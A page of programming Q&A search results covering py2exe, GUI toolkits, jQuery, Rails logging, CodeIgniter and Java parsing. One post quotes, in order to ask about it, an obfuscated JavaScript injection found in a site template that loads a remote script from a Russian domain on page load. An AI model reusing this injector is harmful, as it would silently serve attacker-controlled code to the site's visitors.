Search Results

Search found 9447 results on 378 pages for 'str replace'.

Page 370/378 | < Previous Page | 366 367 368 369 370 371 372 373 374 375 376 377  | Next Page >

  • Accessing py2exe program over network in Windows 98 throws ImportErrors

    - by darvids0n
    I'm running a py2exe-compiled python program from one server machine on a number of client machines (mapped to a network drive on every machine, say W:). For Windows XP and later machines, have so far had zero problems with Python picking up W:\python23.dll (yes, I'm using Python 2.3.5 for W98 compatibility and all that). It will then use W:\zlib.pyd to decompress W:\library.zip containing all the .pyc files like os and such, which are then imported and the program runs no problems. The issue I'm getting is on some Windows 98 SE machines (note: SOME Windows 98 SE machines, others seem to work with no apparent issues). What happens is, the program runs from W:, the W:\python23.dll is, I assume, found (since I'm getting Python ImportErrors, we'd need to be able to execute a Python import statement), but a couple of things don't work: 1) If W:\library.zip contains the only copy of the .pyc files, I get ZipImportError: can't decompress data; zlib not available (nonsense, considering W:\zlib.pyd IS available and works fine with the XP and higher machines on the same network). 2) If the .pyc files are actually bundled INSIDE the python exe by py2exe, OR put in the same directory as the .exe, OR put into a named subdirectory which is then set as part of the PYTHONPATH variable (e.g W:\pylib), I get ImportError: no module named os (os is the first module imported, before sys and anything else). Come to think of it, sys.path wouldn't be available to search if os was imported before it maybe? I'll try switching the order of those imports but my question still stands: Why is this a sporadic issue, working on some networks but not on others? And how would I force Python to find the files that are bundled inside the very executable I run? I have immediate access to the working Windows 98 SE machine, but I only get access to the non-working one (a customer of mine) every morning before their store opens. Thanks in advance! EDIT: Okay, big step forward. After debugging with PY2EXE_VERBOSE, the problem occurring on the specific W98SE machine is that it's not using the right path syntax when looking for imports. Firstly, it doesn't seem to read the PYTHONPATH environment variable (there may be a py2exe-specific one I'm not aware of, like PY2EXE_VERBOSE). Secondly, it only looks in one place before giving up (if the files are bundled inside the EXE, it looks there. If not, it looks in library.zip). EDIT 2: In fact, according to this, there is a difference between the sys.path in the Python interpreter and that of Py2exe executables. Specifically, sys.path contains only a single entry: the full pathname of the shared code archive. Blah. No fallbacks? Not even the current working directory? I'd try adding W:\ to PATH, but py2exe doesn't conform to any sort of standards for locating system libraries, so it won't work. Now for the interesting bit. The path it tries to load atexit, os, etc. from is: W:\\library.zip\<module>.<ext> Note the single slash after library.zip, but the double slash after the drive letter (someone correct me if this is intended and should work). It looks like if this is a string literal, then since the slash isn't doubled, it's read as an (invalid) escape sequence and the raw character is printed (giving W:\library.zipos.pyd, W:\library.zipos.dll, ... instead of with a slash); if it is NOT a string literal, the double slash might not be normpath'd automatically (as it should be) and so the double slash confuses the module loader. Like I said, I can't just set PYTHONPATH=W:\\library.zip\\ because it ignores that variable. It may be worth using sys.path.append at the start of my program but hard-coding module paths is an absolute LAST resort, especially since the problem occurs in ONE configuration of an outdated OS. Any ideas? I have one, which is to normpath the sys.path.. pity I need os for that. Another is to just append os.getenv('PATH') or os.getenv('PYTHONPATH') to sys.path... again, needing the os module. The site module also fails to initialise, so I can't use a .pth file. I also recently tried the following code at the start of the program: for pth in sys.path: fErr.write(pth) fErr.write(' to ') pth.replace('\\\\','\\') # Fix Windows 98 pathing issues fErr.write(pth) fErr.write('\n') But it can't load linecache.pyc, or anything else for that matter; it can't actually execute those commands from the looks of things. Is there any way to use built-in functionality which doesn't need linecache to modify the sys.path dynamically? Or am I reduced to hard-coding the correct sys.path?

    Read the article

  • Weird Javascript in Template. Is this a hacking attempt?

    - by Julian
    I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. What is this javascript doing? Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script... this.v=27047; this.v+=187; ug=["n"]; OV=29534; OV--; var y; var C="C"; var T={}; r=function(){ b=36068; b-=144; M=[]; function f(V,w,U){ return V.substr(w,U); var wH=39640; } var L=["o"]; var cj={}; var qK={N:false}; var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); var BT="BT"; var fV=RegExp; var CE={bf:false}; var UW=''; this.Ky=11592; this.Ky-=237; var VU=document; var _n=[]; try {} catch(wP){}; this.JY=29554; this.JY-=245; function s(V,w){ l=13628; l--; var U="["+w+String("]"); var rk=new fV(U, f("giId",0,1)); this.NS=18321;this.NS+=195;return V.replace(rk, UW); try {} catch(k){}; }; this.jM=""; var CT={}; var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); try {var vv='m'} catch(vv){}; var Os={}; var t=null; var e=String("bod"+"y"); var F=155183-147103; this.kp=''; Z={Ug:false}; y=function(){ var kl=["mF","Q","cR"]; try { Bf=11271; Bf-=179; var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); Fp=VU[u](A); var H=""; try {} catch(WK){}; this.Ca=19053; this.Ca--; var O=s('s5rLcI','2A5IhLo'); var V=F+fa; this.bK=""; var ya=String("de"+"fe"+f("r3bPZ",0,1)); var bk=new String(); pB=9522; pB++; Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; Fp[ya]=[1][0]; Pe=45847; Pe--; VU[e].appendChild(Fp); var lg=new Array(); var aQ={vl:"JC"}; this.KL="KL"; } catch(x){ this.Ja=""; Th=["pj","zx","kO"]; var Jr=''; }; Tr={qZ:21084}; }; this.pL=false; }; be={}; rkE={hb:"vG"}; r(); var bY=new Date(); window.onload=y; cU=["Yr","gv"];

    Read the article

  • Very simple, terse and easy GUI programming “frameworks”

    - by jetxee
    Please list GUI programming libraries, toolkits, frameworks which allow to write GUI apps quickly. I mean in such a way, that GUI is described entirely in a human-readable (and human-writable) plain text file (code) code is terse (1 or 2 lines of code per widget/event pair), suitable for scripting structure and operation of the GUI is evident from the code (nesting of widgets and flow of events) details about how to build the GUI are hidden (things like mainloop, attaching event listeners, etc.) auto-layouts are supported (vboxes, hboxes, etc.) As answers suggest, this may be defined as declarative GUI programming, but it is not necessarily such. Any approach is OK if it works, is easy to use and terse. There are some GUI libraries/toolkits like this. They are listed below. Please extend the list if you see a qualifying toolkit missing. Indicate if the project is crossplatform, mature, active, and give an example if possible. Please use this wiki to discuss only Open Source projects. This is the list so far (in alphabetical order): Fudgets Fudgets is a Haskell library. Platform: Unix. Status: Experimental, but still maintained. An example: import Fudgets main = fudlogue (shellF "Hello" (labelF "Hello, world!" >+< quitButtonF)) GNUstep Renaissance Renaissance allows to describe GUI in simple XML. Platforms: OSX/GNUstep. Status: part of GNUstep. An example below: <window title="Example"> <vbox> <label font="big"> Click the button below to quit the application </label> <button title="Quit" action="terminate:"/> </vbox> </window> HTML HTML-based GUI (HTML + JS). Crossplatform, mature. Can be used entirely on the client side. Looking for a nice “helloworld” example. JavaFX JavaFX is usable for standalone (desktop) apps as well as for web applications. Not completely crossplatform, not yet completely open source. Status: 1.0 release. An example: Frame { content: Button { text: "Press Me" action: operation() { System.out.println("You pressed me"); } } visible: true } Screenshot is needed. Phooey Phooey is another Haskell library. Crossplatform (wxWidgets), HTML+JS backend planned. Mature and active. An example (a little more than a helloworld): ui1 :: UI () ui1 = title "Shopping List" $ do a <- title "apples" $ islider (0,10) 3 b <- title "bananas" $ islider (0,10) 7 title "total" $ showDisplay (liftA2 (+) a b) PythonCard PythonCard describes GUI in a Python dictionary. Crossplatform (wxWidgets). Some apps use it, but the project seems stalled. There is an active fork. I skip PythonCard example because it is too verbose for the contest. Shoes Shoes for Ruby. Platforms: Win/OSX/GTK+. Status: Young but active. A minimal app looks like this: Shoes.app { @push = button "Push me" @note = para "Nothing pushed so far" @push.click { @note.replace "Aha! Click!" } } Tcl/Tk Tcl/Tk. Crossplatform (its own widget set). Mature (probably even dated) and active. An example: #!/usr/bin/env wish button .hello -text "Hello, World!" -command { exit } pack .hello tkwait window . tekUI tekUI for Lua (and C). Platforms: X11, DirectFB. Status: Alpha (usable, but API still evolves). An example: #/usr/bin/env lua ui = require "tek.ui" ui.Application:new { Children = { ui.Window:new { Title = "Hello", Children = { ui.Text:new { Text = "_Hello, World!", Style = "button", Mode = "button", }, }, }, }, }:run() Treethon Treethon for Python. It describes GUI in a YAML file (Python in a YAML tree). Platform: GTK+. Status: work in proress. A simple app looks like this: _import: gtk view: gtk.Window() add: - view: gtk.Button('Hello World') on clicked: print view.get_label() Yet unnamed Python library by Richard Jones: This one is not released yet. The idea is to use Python context managers (with keyword) to structure GUI code. See Richard Jones' blog for details. with gui.vertical: text = gui.label('hello!') items = gui.selection(['one', 'two', 'three']) with gui.button('click me!'): def on_click(): text.value = items.value text.foreground = red XUL XUL + Javascript may be used to create stand-alone desktop apps with XULRunner as well as Mozilla extensions. Mature, open source, crossplatform. <?xml version="1.0"?> <?xml-stylesheet href="chrome://global/skin/" type="text/css"?> <window id="main" title="My App" width="300" height="300" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"> <caption label="Hello World"/> </window> Thank your for contributions!

    Read the article

  • Copying one form's values to another form using JQuery

    - by rsturim
    I have a "shipping" form that I want to offer users the ability to copy their input values over to their "billing" form by simply checking a checkbox. I've coded up a solution that works -- but, I'm sort of new to jQuery and wanted some criticism on how I went about achieving this. Is this well done -- any refactorings you'd recommend? Any advice would be much appreciated! The Script <script type="text/javascript"> $(function() { $("#copy").click(function() { if($(this).is(":checked")){ var $allShippingInputs = $(":input:not(input[type=submit])", "form#shipping"); $allShippingInputs.each(function() { var billingInput = "#" + this.name.replace("ship", "bill"); $(billingInput).val($(this).val()); }) //console.log("checked"); } else { $(':input','#billing') .not(':button, :submit, :reset, :hidden') .val('') .removeAttr('checked') .removeAttr('selected'); //console.log("not checked") } }); }); </script> The Form <div> <form action="" method="get" name="shipping" id="shipping"> <fieldset> <legend>Shipping</legend> <ul> <li> <label for="ship_first_name">First Name:</label> <input type="text" name="ship_first_name" id="ship_first_name" value="John" size="" /> </li> <li> <label for="ship_last_name">Last Name:</label> <input type="text" name="ship_last_name" id="ship_last_name" value="Smith" size="" /> </li> <li> <label for="ship_state">State:</label> <select name="ship_state" id="ship_state"> <option value="RI">Rhode Island</option> <option value="VT" selected="selected">Vermont</option> <option value="CT">Connecticut</option> </select> </li> <li> <label for="ship_zip_code">Zip Code</label> <input type="text" name="ship_zip_code" id="ship_zip_code" value="05401" size="8" /> </li> <li> <input type="submit" name="" /> </li> </ul> </fieldset> </form> </div> <div> <form action="" method="get" name="billing" id="billing"> <fieldset> <legend>Billing</legend> <ul> <li> <input type="checkbox" name="copy" id="copy" /> <label for="copy">Same of my shipping</label> </li> <li> <label for="bill_first_name">First Name:</label> <input type="text" name="bill_first_name" id="bill_first_name" value="" size="" /> </li> <li> <label for="bill_last_name">Last Name:</label> <input type="text" name="bill_last_name" id="bill_last_name" value="" size="" /> </li> <li> <label for="bill_state">State:</label> <select name="bill_state" id="bill_state"> <option>-- Choose State --</option> <option value="RI">Rhode Island</option> <option value="VT">Vermont</option> <option value="CT">Connecticut</option> </select> </li> <li> <label for="bill_zip_code">Zip Code</label> <input type="text" name="bill_zip_code" id="bill_zip_code" value="" size="8" /> </li> <li> <input type="submit" name="" /> </li> </ul> </fieldset> </form> </div>

    Read the article

  • Logging with log4j on tomcat jruby-rack for a Rails 3 application

    - by John
    I just spent the better part of 3 hours trying to get my Rails application logging with Log4j. I've finally got it working, but I'm not sure if what I did is correct. I tried various methods to no avail until my various last attempt. So I'm really looking for some validation here, perhaps some pointers and tips as well -- anything would be appreciated to be honest. I've summarized all my feeble methods into three attempts below. I'm hoping for some enlightenment on where I went wrong with each attempt -- even if it means I get ripped up. Thanks for the help in advance! System Specs Rails 3.0 Windows Server 2008 Log4j 1.2 Tomact 6.0.29 Java 6 Attempt 1 - Configured Tomcat to Use Log4J I basically followed the guide on the Apache Tomcat website here. The steps are: Create a log4j.properties file in $CATALINA_HOME/lib Download and copy the log4j-x.y.z.jar into $CATALINA_HOME/lib Replace $CATALINA_HOME/bin/tomcat-juli.jar with the tomcat-juli.jar from the Apache Tomcat Extras folder Copy tomcat-juli-adapters.jar from the Apache Tomcat Extras folder into $CATALINA_HOME/lib Delete $CATALINA_BASE/conf/logging.properties Start Tomcat (as a service) Expected Results According to the Guide I should have seen a tomcat.log file in my $CATALINA_BASE/logs folder. Actual Results No tomcat.log Saw three of the standard logs instead jakarta_service_20101231.log stderr_20101231.log stdout_20101231.log Question Shouldn't I have at least seen a tomcat.log file? Attempt 2 - Use default Tomcat logging (commons-logging) Reverted all the changes from the previous setup Modified $CATALINA_BASE/conf/logging.properties by doing the following: Adding a setting for my application in the handlers line: 5rails3.org.apache.juli.FileHandler Adding Handler specific properties 5rails3.org.apache.juli.FileHandler.level = FINE 5rails3.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 5rails3.org.apache.juli.FileHandler.prefix = rails3. Adding Facility specific properties org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/rails3].level = INFO org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/rails3].handlers = 4host-manager.org.apache.juli.FileHandler Modified my web.xml by adding the following context parameter as per the Logging section of the jruby-rack readme (I also modified my warbler.rb accordingly, but I did opted to change the web.xml directly to test things faster). <context-param> <param-name>jruby.rack.logging</param-name> <param-value>commons_logging</param-value> </context-param> Restarted Tomcat Results A log file was created (rails3.log), however there was no log information in the file. Attempt 2A - Use Log4j with existing set up I decided to go Log4j another whirl with this new web.xml setting. Copied the log4j.jar into my WEB-INF/lib folder Created a log4j.properties file and put it into WEB-INF/classes log4j.rootLogger=INFO, R log4j.logger.javax.servlet=DEBUG log4j.appender.R=org.apache.log4j.RollingFileAppender log4j.appender.R.File=${catalina.base}/logs/rails3.log log4j.appender.R.MaxFileSize=5036KB log4j.appender.R.MaxBackupIndex=4 log4j.appender.R.layout=org.apache.log4j.PatternLayout log4j.appender.R.layout.ConversionPattern=%d{dd MMM yyyy HH:mm:ss} [%t] %-5p %c %x - %m%n Restarted Tomcat Results Same as Attempt 2 NOTE: I used log4j.logger.javax.servlet=DEBUG because I read in the jruby-rack README that all logging output is automatically redirected to the javax.servlet.ServletContext#log method. So I though this would capture it. I was obviously wrong. Question Why didn't this work? Isn't Log4J using the commons_logging API? Attempt 3 - Tried out slf4j (WORKED) A bit uncertain as to why Attempt 2A didn't work, I thought to myself, maybe I can't use commons_logging for the jruby.rack.logging parameter because it's probably not using commons_logging API... (but I was still not sure). I saw slf4j as an option. I have never heard of it and by stroke of luck, I decided to look up what it is. After reading briefly about what it does, I thought it was good of a shot as any and decided to try it out following the instructions here. Continuing from the setup of Attempt 2A: Copied slf4j-api-1.6.1.jar and slf4j-simple-1.6.1.jar into my WEB-INF/lib folder I also copied slf4j-log4j12-1.6.1.jar into my WEB-INF/lib folder Restarted Tomcat And VIOLA! I now have logging information going into my rails3.log file. So the big question is: WTF? Even though logging seems to be working now, I'm really not sure if I did this right. So like I said earlier, I'm really looking for some validation more or less. I'd also appreciate any pointers/tips/advice if you have any. Thanks!

    Read the article

  • Problem with ajax form on Codeigniter

    - by Code Burn
    Everytime I test the email is send correctly. (I have tested in PC: IE6, IE7, IE8, Safari, Firefox, Chrome. MAC: Safari, Firefox, Chrome.) Nome: Jon Doe Empresa: Star Cargo: Developer Email: [email protected] Telefone: 090909222988 Assunto: Subject here.. But I keep recieving emails like this from costumers: Nome: Empresa: Cargo: Email: Telefone: Assunto: CONTACT_FORM.PHP <form name="frm" id="frm"> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Nome<font style="color:#EE3063;">*</font></div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="Cnome" id="Cnome" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Empresa<font style="color:#EE3063;">*</font></div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="CEmpresa" id="CEmpresa" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Cargo</div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="CCargo" id="CCargo" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Email<font style="color:#EE3063;">*</font></div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="CEmail" id="CEmail" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Telefone</div> <div class="campoFormulario inputDeCampo" ><input class="texto textocinzaescuro" size="31" name="CTelefone" id="CTelefone" value=""/></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >Assunto<font style="color:#EE3063;">*</font></div> <div class="campoFormulario inputDeCampo" ><textarea class="texto textocinzaescuro" name="CAssunto" id="CAssunto" rows="2" cols="28"></textarea></div> <div class="campoFormulario nomeDeCampo texto textocinzaescuro" >&nbsp;</div> <div class="campoFormulario inputDeCampo" style="text-align:right;" ><input id="Cbutton" class="texto textocinzaescuro" type="submit" name="submit" value="Enviar" /></div> </form> <script type="text/javascript"> $(function() { $("#Cbutton").click(function() { if(validarForm()){ var Cnome = $("input#Cnome").val(); var CEmpresa = $("input#CEmpresa").val(); var CEmail = $("input#CEmail").val(); var CCargo = $("input#CCargo").val(); var CTelefone = $("input#CTelefone").val(); var CAssunto = $("textarea#CAssunto").val(); var dataString = 'nome='+ Cnome + '&Empresa=' + CEmpresa + '&Email=' + CEmail + '&Cargo=' + CCargo + '&Telefone=' + CTelefone + '&Assunto=' + CAssunto; //alert (dataString);return false; $.ajax({ type: "POST", url: "http://www.myserver.com/index.php/pt/envia", data: dataString, success: function() { $('#frm').remove(); $('#blocoform').append("<br />Obrigado. <img id='checkmark' src='http://www.myserver.com/public/images/estrutura/ok.gif' /><br />Será contactado brevemente.<br /><br /><br /><br /><br /><br />") .hide() .fadeIn(1500); } }); } return false; }); }); function validarForm(){ var error = 0; if(!validateNome(document.getElementById("Cnome"))){ error = 1 ;} if(!validateNome(document.getElementById("CEmpresa"))){ error = 1 ;} if(!validateEmail(document.getElementById("CEmail"))){ error = 1 ;} if(!validateNome(document.getElementById("CAssunto"))){ error = 1 ;} if(error == 0){ //frm.submit(); return true; }else{ alert('Preencha os campos correctamente.'); return false; } } function validateNome(fld){ if( fld.value.length == 0 ){ fld.style.backgroundColor = '#FFFFCC'; //alert('Descrição é um campo obrigatório.'); return false; }else { fld.style.background = 'White'; return true; } } function trim(s) { return s.replace(/^\s+|\s+$/, ''); } function validateEmail(fld) { var tfld = trim(fld.value); var emailFilter = /^[^@]+@[^@.]+\.[^@]*\w\w$/ ; var illegalChars= /[\(\)\<\>\,\;\:\\\"\[\]]/ ; if (fld.value == "") { fld.style.background = '#FFFFCC'; //alert('Email é um campo obrigatório.'); return false; } else if (!emailFilter.test(tfld)) { //alert('Email inválido.'); fld.style.background = '#FFFFCC'; return false; } else if (fld.value.match(illegalChars)) { fld.style.background = '#FFFFCC'; //alert('Email inválido.'); return false; } else { fld.style.background = 'White'; return true; } } </script> FUNCTION ENVIA (email sender): function envia() { $this->load->helper(array('form', 'url')); $nome = $_POST['nome']; $empresa = $_POST['Empresa']; $cargo = $_POST['Cargo']; $email = $_POST['Email']; $telefone = $_POST['Telefone']; $assunto = $_POST['Assunto']; $mensagem = " Nome:".$nome." Empresa:".$empresa." Cargo:".$cargo." Email:".$email." Telefone:".$telefone." Assunto:".$assunto.""; $headers = 'From: [email protected]' . "\r\n" . 'Reply-To: no-reply' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); mail('[email protected]', $mensagem, $headers); }

    Read the article

  • Parse a text file into multiple text file

    - by Vijay Kumar Singh
    I want to get multiple file by parsing a input file Through Java. The Input file contains many fasta format of thousands of protein sequence and I want to generate raw format(i.e., without any comma semicolon and without any extra symbol like "", "[", "]" etc) of each protein sequence. A fasta sequence starts form "" symbol followed by description of protein and then sequence of protein. For example ? lcl|NC_000001.10_cdsid_XP_003403591.1 [gene=LOC100652771] [protein=hypothetical protein LOC100652771] [protein_id=XP_003403591.1] [location=join(12190..12227,12595..12721,13403..13639)] MSESINFSHNLGQLLSPPRCVVMPGMPFPSIRSPELQKTTADLDHTLVSVPSVAESLHHPEITFLTAFCL PSFTRSRPLPDRQLHHCLALCPSFALPAGDGVCHGPGLQGSCYKGETQESVESRVLPGPRHRH Like above formate the input file contains 1000s of protein sequence. I have to generate thousands of raw file containing only individual protein sequence without any special symbol or gaps. I have developed the code for it in Java but out put is : Cannot open a file followed by cannot find file. Please help me to solve my problem. Regards Vijay Kumar Garg Varanasi Bharat (India) The code is /*Java code to convert FASTA format to a raw format*/ import java.io.*; import java.util.*; import java.util.regex.*; import java.io.FileInputStream; // java package for using regular expression public class Arrayren { public static void main(String args[]) throws IOException { String a[]=new String[1000]; String b[][] =new String[1000][1000]; /*open the id file*/ try { File f = new File ("input.txt"); //opening the text document containing genbank ids FileInputStream fis = new FileInputStream("input.txt"); //Reading the file contents through inputstream BufferedInputStream bis = new BufferedInputStream(fis); // Writing the contents to a buffered stream DataInputStream dis = new DataInputStream(bis); //Method for reading Java Standard data types String inputline; String line; String separator = System.getProperty("line.separator"); // reads a line till next line operator is found int i=0; while ((inputline=dis.readLine()) != null) { i++; a[i]=inputline; a[i]=a[i].replaceAll(separator,""); //replaces unwanted patterns like /n with space a[i]=a[i].trim(); // trims out if any space is available a[i]=a[i]+".txt"; //takes the file name into an array try // to handle run time error /*take the sequence in to an array*/ { BufferedReader in = new BufferedReader (new FileReader(a[i])); String inline = null; int j=0; while((inline=in.readLine()) != null) { j++; b[i][j]=inline; Pattern q=Pattern.compile(">"); //Compiling the regular expression Matcher n=q.matcher(inline); //creates the matcher for the above pattern if(n.find()) { /*appending the comment line*/ b[i][j]=b[i][j].replaceAll(">gi",""); //identify the pattern and replace it with a space b[i][j]=b[i][j].replaceAll("[a-zA-Z]",""); b[i][j]=b[i][j].replaceAll("|",""); b[i][j]=b[i][j].replaceAll("\\d{1,15}",""); b[i][j]=b[i][j].replaceAll(".",""); b[i][j]=b[i][j].replaceAll("_",""); b[i][j]=b[i][j].replaceAll("\\(",""); b[i][j]=b[i][j].replaceAll("\\)",""); } /*printing the sequence in to a text file*/ b[i][j]=b[i][j].replaceAll(separator,""); b[i][j]=b[i][j].trim(); // trims out if any space is available File create = new File(inputline+"R.txt"); try { if(!create.exists()) { create.createNewFile(); // creates a new file } else { System.out.println("file already exists"); } } catch(IOException e) // to catch the exception and print the error if cannot open a file { System.err.println("cannot create a file"); } BufferedWriter outt = new BufferedWriter(new FileWriter(inputline+"R.txt", true)); outt.write(b[i][j]); // printing the contents to a text file outt.close(); // closing the text file System.out.println(b[i][j]); } } catch(Exception e) { System.out.println("cannot open a file"); } } } catch(Exception ex) // catch the exception and prints the error if cannot find file { System.out.println("cannot find file "); } } } If you provide me correct it will be much easier to understand.

    Read the article

  • mvc3 datatabels and ajax-beginform

    - by MIkCode
    im trying to send and ajax request and returning the result into a new table i debugged the req and i can confirm that evry thing is good except the VIEW the end result is an empty table instead of one row one more weird thing is if i page source i can see all the table result(more than the one that suppose to) this is the view: @model Fnx.Esb.ServiceMonitor.ViewModel.MainModels @{ ViewBag.Title = "MainSearch"; } @Html.EditorForModel() @{ AjaxOptions ajaxOpts = new AjaxOptions { UpdateTargetId = "MainTable", InsertionMode = InsertionMode.Replace, Url = Url.Action("queryData", "MainSearch"), }; } @using (Ajax.BeginForm(ajaxOpts)) { <div class="container"> <form action="#" method="post"> <div id="mainSearch"> @Html.EditorFor(x => x.MainSearchModel) </div> <br /> <br /> <br /> <br /> <div id="advancedSearch"> <div class="accordion" id="accordion2"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#accordion2" href="#collapseOne"> Advanced Search </a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> @Html.EditorFor(x => x.AdvanceSearchContainerModel) </div> </div> </div> </div> </div> <br /> <br /> <button type="submit" class="btn"> <i class="icon-search"></i> Search </button> <button type="reset" class="btn"> <i class="icon-trash"></i> clear </button> </form> <br /> <br /> <br /> <br /> <br /> <br /> <table id="MainTable" cellpadding="0" cellspacing="0" border="0" class="table table-striped table-bordered"> <thead> <tr> <th> serviceDuration </th> <th> status </th> <th> ESBLatency </th> <th> serviceName </th> <th> serviceId </th> <th> startTime </th> <th> endTime </th> <th> instanceID </th> </tr> </thead> <tbody> @foreach (var item in Model.MainTableModel) { <tr> <td> @Html.DisplayFor(modelItem => item.serviceDuration) </td> <td> @Html.DisplayFor(modelItem => item.status) </td> <td> @Html.DisplayFor(modelItem => item.ESBLatency) </td> <td> @Html.DisplayFor(modelItem => item.serviceName) </td> <td> @Html.DisplayFor(modelItem => item.serviceId) </td> <td> @Html.DisplayFor(modelItem => item.startTime) </td> <td> @Html.DisplayFor(modelItem => item.endTime) </td> <td> @Html.DisplayFor(modelItem => item.instanceID) </td> </tr> } </tbody> </table> </div> } the datatables: javascript options $('#MainTable').dataTable({ "sDom": "<'row'<'span6'l><'span6'f>r>t<'row'<'span6'i><'span6'p>>", "bDestroy": true }); thanks miki

    Read the article

  • Custom validation works in development but not in unit test

    - by Geolev
    I want to validate that at least one of two columns have a value in my model. I found somewhere on the web that I could create a custom validator as follows: # Check for the presence of one or another field: # :validates_presence_of_at_least_one_field :last_name, :company_name - would require either last_name or company_name to be filled in # also works with arrays # :validates_presence_of_at_least_one_field :email, [:name, :address, :city, :state] - would require email or a mailing type address module ActiveRecord module Validations module ClassMethods def validates_presence_of_at_least_one_field(*attr_names) msg = attr_names.collect {|a| a.is_a?(Array) ? " ( #{a.join(", ")} ) " : a.to_s}.join(", ") + "can't all be blank. At least one field must be filled in." configuration = { :on => :save, :message => msg } configuration.update(attr_names.extract_options!) send(validation_method(configuration[:on]), configuration) do |record| found = false attr_names.each do |a| a = [a] unless a.is_a?(Array) found = true a.each do |attr| value = record.respond_to?(attr.to_s) ? record.send(attr.to_s) : record[attr.to_s] found = !value.blank? end break if found end record.errors.add_to_base(configuration[:message]) unless found end end end end end I put this in a file called lib/acs_validator.rb in my project and added "require 'acs_validator'" to my environment.rb. This does exactly what I want. It works perfectly when I manually test it in the development environment but when I write a unit test it breaks my test environment. This is my unit test: require 'test_helper' class CustomerTest < ActiveSupport::TestCase # Replace this with your real tests. test "the truth" do assert true end test "customer not valid" do puts "customer not valid" customer = Customer.new assert !customer.valid? assert customer.errors.invalid?(:subdomain) assert_equal "Company Name and Last Name can't both be blank.", customer.errors.on(:contact_lname) end end This is my model: class Customer < ActiveRecord::Base validates_presence_of :subdomain validates_presence_of_at_least_one_field :customer_company_name, :contact_lname, :message => "Company Name and Last Name can't both be blank." has_one :service_plan end When I run the unit test, I get the following error: DEPRECATION WARNING: Rake tasks in vendor/plugins/admin_data/tasks, vendor/plugins/admin_data/tasks, and vendor/plugins/admin_data/tasks are deprecated. Use lib/tasks instead. (called from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/tasks/rails.rb:10) Couldn't drop acs_test : #<ActiveRecord::StatementInvalid: PGError: ERROR: database "acs_test" is being accessed by other users DETAIL: There are 1 other session(s) using the database. : DROP DATABASE IF EXISTS "acs_test"> acs_test already exists NOTICE: CREATE TABLE will create implicit sequence "customers_id_seq" for serial column "customers.id" NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "customers_pkey" for table "customers" NOTICE: CREATE TABLE will create implicit sequence "service_plans_id_seq" for serial column "service_plans.id" NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "service_plans_pkey" for table "service_plans" /usr/bin/ruby1.8 -I"lib:test" "/usr/lib/ruby/gems/1.8/gems/rake-0.8.7/lib/rake/rake_test_loader.rb" "test/unit/customer_test.rb" "test/unit/service_plan_test.rb" "test/unit/helpers/dashboard_helper_test.rb" "test/unit/helpers/customers_helper_test.rb" "test/unit/helpers/service_plans_helper_test.rb" /usr/lib/ruby/gems/1.8/gems/activerecord-2.3.8/lib/active_record/base.rb:1994:in `method_missing_without_paginate': undefined method `validates_presence_of_at_least_one_field' for #<Class:0xb7076bd0> (NoMethodError) from /usr/lib/ruby/gems/1.8/gems/will_paginate-2.3.12/lib/will_paginate/finder.rb:170:in `method_missing' from /home/george/projects/advancedcomfortcs/app/models/customer.rb:3 from /usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require' from /usr/local/lib/site_ruby/1.8/rubygems/custom_require.rb:31:in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-2.3.8/lib/active_support/dependencies.rb:158:in `require' from /usr/lib/ruby/gems/1.8/gems/activesupport-2.3.8/lib/active_support/dependencies.rb:265:in `require_or_load' from /usr/lib/ruby/gems/1.8/gems/activesupport-2.3.8/lib/active_support/dependencies.rb:224:in `depend_on' from /usr/lib/ruby/gems/1.8/gems/activesupport-2.3.8/lib/active_support/dependencies.rb:136:in `require_dependency' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:414:in `load_application_classes' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:413:in `each' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:413:in `load_application_classes' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:411:in `each' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:411:in `load_application_classes' from /usr/lib/ruby/gems/1.8/gems/rails-2.3.8/lib/initializer.rb:197:in `process' from 